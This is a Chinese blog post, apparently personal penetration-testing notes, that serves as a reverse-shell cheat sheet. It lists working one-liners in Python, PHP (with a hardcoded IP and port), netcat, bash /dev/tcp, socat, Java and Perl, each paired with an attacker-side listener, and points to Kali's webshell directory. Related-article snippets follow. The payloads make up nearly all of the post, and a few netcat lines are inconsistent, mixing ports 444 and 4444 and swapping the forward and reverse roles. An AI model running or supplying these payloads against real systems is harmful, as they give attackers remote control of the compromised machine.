反弹shell

最新推荐文章于 2024-07-24 21:24:56 发布
最新推荐文章于 2024-07-24 21:24:56 发布
阅读量166 收藏
点赞数 1
分类专栏: 笔记 文章标签: shell 扫描测试工具 测试工程师
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/106482742
版权

反弹shell

python

弹出终端
python -c 'import pty; pty.spawn("/bin/bash")'

靶机:
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("ip",port));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
测试机:
nc -nvlp port

php

靶机:
<?php $sock=fsockopen("192.168.238.143",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
测试机:nc -nvlp port

netcat

靶机:nc -lvp port -t -e /bin/bash
测试机: nc ip port
正向
靶机:nc -lvp  4444 -t -e /bin/bash
测试机:nc -nv ip 444
反向
靶机:nc -lvp 4444
测试机:nc -t -e /bin/bash ip port

bash

bash -i>& /dev/tcp/[ip]/[port] 0>&1
nc -nvlp port

socket

socat TCP-LISTEN:port 
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip port

java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

perl

perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

msfvenom

常见fantanshell

kali webshells

/usr/share/webshells

在这里插入图片描述

~~...
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
Wazuh检测反弹shell
gehongzhou的专栏
11-18 1888
Wazuh通过在agent服务器上执行指定的命令,并收集命令结果,可以在一定程度上发现反弹shell的入侵行为。 目前有2中常见的检测方法,一种是通过netstat输出网络连接中的shell进程来识别,另一种是通过ps输出进程信息中的反弹shell命令特征来识别。 1. 在agent的/var/ossec/etc/ossec.conf文件末尾增加自定义的命令,并重启 <ossec_c...
exec运行shell语句
漫漫求学中的孩儿
09-12 6075
用fork函数创建子进程后,子进程往往要调用一种exec函数以执行另一个程序。当进程调用一种exec函数时,该进程完全由新程序代换。exec只是用另一个新程序替换了当前进程的正文、数据、堆和栈段。 #include   extern char **environ;   int execl(const char *path, const char *arg, ..
webshell反弹shell使用详解
有勇气的牛排博客
07-24 1583
1 介绍 在对linux服务器渗透测试的过程中,我们在getshell得到一个低权限的webshell,由于webshell是非交互式shell,通常要反弹一个交互式的shell,然后提权(不然提权后,还是原来的权限) 2 webshell 获取 2.1 php策略 PHP环境下反弹shell,过去我们通常用phpspy等shell自带反弹即可,这里将其反弹部分代码提取出来,访问即可反弹到指定IP端口一个普通交互shell。 (1)下面利用weevely生成一个php weevely generate 12
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
CVE-2018-3191 反弹shell
05-18
**CVE-2018-3191:反弹Shell漏洞详解** 在信息安全领域,"反弹Shell"是一种常见的攻击手段,常被黑客用于远程控制受感染的系统。CVE-2018-3191是针对这一技术的一个具体安全漏洞实例。这个漏洞可能影响到各种软件或...
docker部署mysql8.x版本,编写shell脚本自动部署安装mysql
qq_43700885的博客
07-23 395
*1.**先自行安装好docker环境,docker的镜像注册中心最好是国内的,例如执行一下命令直接修改docker配置,这里基本就按照成功了,直接输入docker查看日志命令查看容器启动情况。将下面的命令直接粘贴到文件install-mysql.sh。加载刚修改的配置文件并重新启动docker。**2.**创建mysql自动部署脚本文件。接下来直接执行脚本输入一下命令。出现下图红框标识就表示安装成功。
shell命令-2
m0_73664110的博客
07-21 999
s:套接字还被称为数据接口文件,这种类型的文件通常被用在网络上的数据连接。p:管道文件(FIFO)也是一种特殊的文件类型,他主要的目的解决多个程序同时访问一个文件所造成的错误问题,first-in-first-out。cat xxx.txt:显示文本的内容直接输出在屏幕上(不建议查看内容过多的文件,编辑器只能显示1000行)find . -maxdepth 3 -type f:当前目录开始深度为3层的所有普通文件。find . -name “*.txt”:在当前文件夹下查找以.txt结尾的文件。
MAC安装brew+python+pip
weixin_44435110的博客
07-21 293
要在 macOS 上安装 Homebrew,请按照以下步骤操作
内网隧道——隧道利用方法
qq_55202378的博客
07-23 759
(2)在靶机(192.168.52.138)3389端口和跳板机(192.168.52.143)的6666端口之间搭建一条隧道,就能通过跳板机的8888端口连接内网的3389端口。(2)在kali上连接跳板机8888端口,lcx会将跳板机8888端口的流量转发到靶机(192.168.52.138)3389端口上。工具进行端口转发,在靶机和跳板机中搭建一条隧道,用攻击者电脑连接跳板机隧道端口,通过跳板机的端口,获取到内网靶机的远程桌面权限。注:通过MSF获取到的shell,是经过加密了的。
虚拟环境变量和全局环境变量设置
Ppandaer的博客
07-23 281
/.bashrc和activate脚本各自扮演着不同的角色,它们都在 shell 环境配置中起关键作用,但是它们的职责范围和激活场景有所不同。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 916
Shell脚本的使用
shell编程——awk
nianwan2157的博客
07-19 843
root@server ~]# awk -v test="hello world" BEGIN'{ print test}'# 变量定义在-V参数后,print test}'#变量定义在BEGIN中。允许用户自定义自己的变量以便在程序代码中使用,变量名命名规则与大多数编程语言相同,只。变量名命名规则与大多数编程语言相同,只能使用字母、数字和下划线,且不能以数字开头。awk允许用户自定义自己的变量以便在程序代码中使用。能使用字母、数字和下划线,且不能以数字开头。因此,如果想输出空白行,则需要使。
第四节shell条件测试(5)
weixin_73298423的博客
07-21 268
shell的逻辑操作符
反弹shell的方式——之NC反弹shell
最新发布
aihua002的博客
07-24 202
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
关于三星机玩游戏长时间不操作锁屏的解决办法
weixin_44941809的博客
07-22 405
解决三星屏幕锁问题
【linux】Shell脚本中basename和dirname的详细用法教程
景天科技苑
07-22 2394
Shell脚本是Linux和Unix系统中非常重要的一部分,它允许用户将多个命令组合成一个可执行的文件,从而提高工作效率和自动化水平。在Shell脚本编程中,basename和dirname是两个非常实用的命令,它们分别用于获取文件的基本名称(不带路径)和文件所在的目录路径。本文将详细介绍这两个命令的用法,并通过实际案例展示如何在Shell脚本中使用它们。
反弹shell无法反弹
08-13
关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值